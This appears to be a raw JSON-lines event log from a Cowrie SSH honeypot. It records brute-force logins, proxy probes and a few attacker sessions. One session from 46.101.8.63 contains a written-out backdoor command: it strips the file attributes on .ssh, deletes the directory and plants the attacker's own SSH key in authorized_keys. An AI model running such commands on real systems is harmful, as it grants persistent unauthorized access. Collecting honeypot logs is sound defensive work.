{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":54330,"dst_ip":"1.2.3.4","dst_port":22,"session":"5839995ce31f","protocol":"ssh","message":"New connection: 46.101.8.63:54330 (1.2.3.4:22) [session: 5839995ce31f]","sensor":"my-vps","timestamp":"2025-09-08T23:50:48.567428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:50:48.568346Z","src_ip":"46.101.8.63","session":"5839995ce31f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:50:48.589514Z","src_ip":"46.101.8.63","session":"5839995ce31f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:50:48.714325Z","src_ip":"46.101.8.63","session":"5839995ce31f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:50:48.736692Z","src_ip":"46.101.8.63","session":"0d6d65a906e3"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:50:48.737470Z","src_ip":"46.101.8.63","session":"5839995ce31f"}
{"eventid":"cowrie.session.connect","src_ip":"185.246.128.133","src_port":26796,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8e178b3145c","protocol":"ssh","message":"New connection: 185.246.128.133:26796 (1.2.3.4:22) [session: e8e178b3145c]","sensor":"my-vps","timestamp":"2025-09-08T23:51:01.961302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh-0.6.0","message":"Remote SSH version: SSH-2.0-libssh-0.6.0","sensor":"my-vps","timestamp":"2025-09-08T23:51:01.963289Z","src_ip":"185.246.128.133","session":"e8e178b3145c"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-09-08T23:51:02.008307Z","src_ip":"185.246.128.133","session":"e8e178b3145c"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:51:02.904891Z","src_ip":"185.246.128.133","session":"e8e178b3145c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"185.246.128.133","src_port":15912,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:15912","sensor":"my-vps","timestamp":"2025-09-08T23:51:02.950724Z","session":"e8e178b3145c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T23:51:02.995540Z","src_ip":"185.246.128.133","session":"e8e178b3145c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"185.246.128.133","src_port":13176,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:13176","sensor":"my-vps","timestamp":"2025-09-08T23:51:03.127038Z","session":"e8e178b3145c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T23:51:03.172167Z","src_ip":"185.246.128.133","session":"e8e178b3145c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"185.246.128.133","src_port":20441,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:20441","sensor":"my-vps","timestamp":"2025-09-08T23:51:03.302864Z","session":"e8e178b3145c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T23:51:03.347442Z","src_ip":"185.246.128.133","session":"e8e178b3145c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"185.246.128.133","src_port":24282,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24282","sensor":"my-vps","timestamp":"2025-09-08T23:51:03.479031Z","session":"e8e178b3145c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T23:51:03.523815Z","src_ip":"185.246.128.133","session":"e8e178b3145c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"77.88.44.55","dst_port":80,"src_ip":"185.246.128.133","src_port":5321,"message":"direct-tcp connection request to 77.88.44.55:80 from 127.0.0.1:5321","sensor":"my-vps","timestamp":"2025-09-08T23:51:03.654915Z","session":"e8e178b3145c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"77.88.44.55","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 77.88.44.55:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T23:51:03.699583Z","src_ip":"185.246.128.133","session":"e8e178b3145c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"185.246.128.133","src_port":22212,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:22212","sensor":"my-vps","timestamp":"2025-09-08T23:51:03.831077Z","session":"e8e178b3145c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-08T23:51:03.875823Z","src_ip":"185.246.128.133","session":"e8e178b3145c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:51:03.921256Z","src_ip":"185.246.128.133","session":"e8e178b3145c"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":52666,"dst_ip":"1.2.3.4","dst_port":22,"session":"918843378586","protocol":"ssh","message":"New connection: 45.150.34.92:52666 (1.2.3.4:22) [session: 918843378586]","sensor":"my-vps","timestamp":"2025-09-08T23:51:12.283322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:51:12.284098Z","src_ip":"45.150.34.92","session":"918843378586"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:51:18.976935Z","src_ip":"45.150.34.92","session":"918843378586"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:51:18.978616Z","src_ip":"45.150.34.92","session":"918843378586"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":36650,"dst_ip":"1.2.3.4","dst_port":22,"session":"7862979f97b5","protocol":"ssh","message":"New connection: 182.18.161.165:36650 (1.2.3.4:22) [session: 7862979f97b5]","sensor":"my-vps","timestamp":"2025-09-08T23:51:19.436882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:51:19.438699Z","src_ip":"182.18.161.165","session":"7862979f97b5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:51:19.693647Z","src_ip":"182.18.161.165","session":"7862979f97b5"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"administrator2025","message":"login attempt [administrator/administrator2025] failed","sensor":"my-vps","timestamp":"2025-09-08T23:51:20.755162Z","src_ip":"182.18.161.165","session":"7862979f97b5"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:51:22.012483Z","src_ip":"182.18.161.165","session":"7862979f97b5"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":58258,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa90afa7d557","protocol":"ssh","message":"New connection: 93.113.63.124:58258 (1.2.3.4:22) [session: aa90afa7d557]","sensor":"my-vps","timestamp":"2025-09-08T23:51:40.167470Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:51:40.168142Z","src_ip":"93.113.63.124","session":"aa90afa7d557"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:51:40.227372Z","src_ip":"93.113.63.124","session":"aa90afa7d557"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"1","message":"login attempt [mysql/1] failed","sensor":"my-vps","timestamp":"2025-09-08T23:51:40.556804Z","src_ip":"93.113.63.124","session":"aa90afa7d557"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:51:41.619075Z","src_ip":"93.113.63.124","session":"aa90afa7d557"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":50864,"dst_ip":"1.2.3.4","dst_port":22,"session":"de7fe05704fa","protocol":"ssh","message":"New connection: 46.101.8.63:50864 (1.2.3.4:22) [session: de7fe05704fa]","sensor":"my-vps","timestamp":"2025-09-08T23:51:45.072443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:51:45.073378Z","src_ip":"46.101.8.63","session":"de7fe05704fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:51:45.096658Z","src_ip":"46.101.8.63","session":"de7fe05704fa"}
{"eventid":"cowrie.login.success","username":"root","password":"QQ123456@","message":"login attempt [root/QQ123456@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:51:45.232457Z","src_ip":"46.101.8.63","session":"de7fe05704fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:51:45.329340Z","src_ip":"46.101.8.63","session":"de7fe05704fa"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:51:45.330048Z","src_ip":"46.101.8.63","session":"de7fe05704fa"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:51:45.330837Z","src_ip":"46.101.8.63","session":"de7fe05704fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:51:45.355464Z","src_ip":"46.101.8.63","session":"de7fe05704fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:51:45.458461Z","src_ip":"46.101.8.63","session":"de7fe05704fa"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:51:45.459199Z","src_ip":"46.101.8.63","session":"de7fe05704fa"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:51:45.485087Z","src_ip":"46.101.8.63","session":"de7fe05704fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:51:45.485989Z","src_ip":"46.101.8.63","session":"de7fe05704fa"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":51174,"dst_ip":"1.2.3.4","dst_port":22,"session":"373e95d0f2a4","protocol":"ssh","message":"New connection: 46.101.8.63:51174 (1.2.3.4:22) [session: 373e95d0f2a4]","sensor":"my-vps","timestamp":"2025-09-08T23:51:45.505681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:51:45.506567Z","src_ip":"46.101.8.63","session":"373e95d0f2a4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:51:45.528238Z","src_ip":"46.101.8.63","session":"373e95d0f2a4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:51:45.656244Z","src_ip":"46.101.8.63","session":"373e95d0f2a4"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:51:46.681101Z","src_ip":"46.101.8.63","session":"373e95d0f2a4"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"912a208ebe28","protocol":"ssh","message":"New connection: 46.101.8.63:51824 (1.2.3.4:22) [session: 912a208ebe28]","sensor":"my-vps","timestamp":"2025-09-08T23:51:46.701483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:51:46.702376Z","src_ip":"46.101.8.63","session":"912a208ebe28"}
